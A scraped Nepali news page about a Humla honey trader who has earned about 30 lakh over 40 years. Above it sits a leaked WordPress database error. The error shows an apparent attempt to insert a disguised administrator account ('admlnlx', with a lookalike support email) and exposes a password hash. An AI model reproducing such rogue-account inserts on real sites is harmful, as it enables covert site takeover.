WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BAEcNO3Glg8GgJN7Aj19Lpj97r5JNw0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-04 15:10:19', '', 'admlnlx', 'admlnlx')

४० वर्षदेखि महको ब्यापारमा – Gaule Khabar

४० वर्षदेखि महको ब्यापारमा

४० वर्षदेखि महको ब्यापारमा

कचहरी डट कम, हुम्ला ।।

हुम्ला जिल्ला ठेहे गाविस वडा नं ७ बैजीबाडाका बुम लामाले ४० वर्षसम्म मह व्यापार गरेर ३० लाख आम्दानी गर्न सफल भएका छन् ।

१५ वर्षको उमेरदेखि महको व्यापार गर्ने बुम लामा अहिले ६० वर्षका छन् । महको आम्दानीबाट घर खर्च, शिक्षा, स्वास्थ्य र अन्य आवश्यक काममा यो रकमले सघाएको छ । उनले वि.सं. २०४५ सालमा महबाट सबैभन्दा धेरै २ लाख ५० हजार र न्युनतम ७५ हजारसम्म कमाई गर्दै आएका छन् । यो वर्ष २०६९ सालमा वर्षा समयमा धेरै पानी परेकोले विभिन्न प्रकारका मौरीका रोगहरुले ३८ घार मौरी भागे भने ७५ घारहरुबाट २ क्वीन्टल ५० केजी महबाट १ लाख २५ हजारको आम्दानी भएको छ । हुम्लामा बुम लामालाई मह बाजेका रुपमा चिन्दछन् ।

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका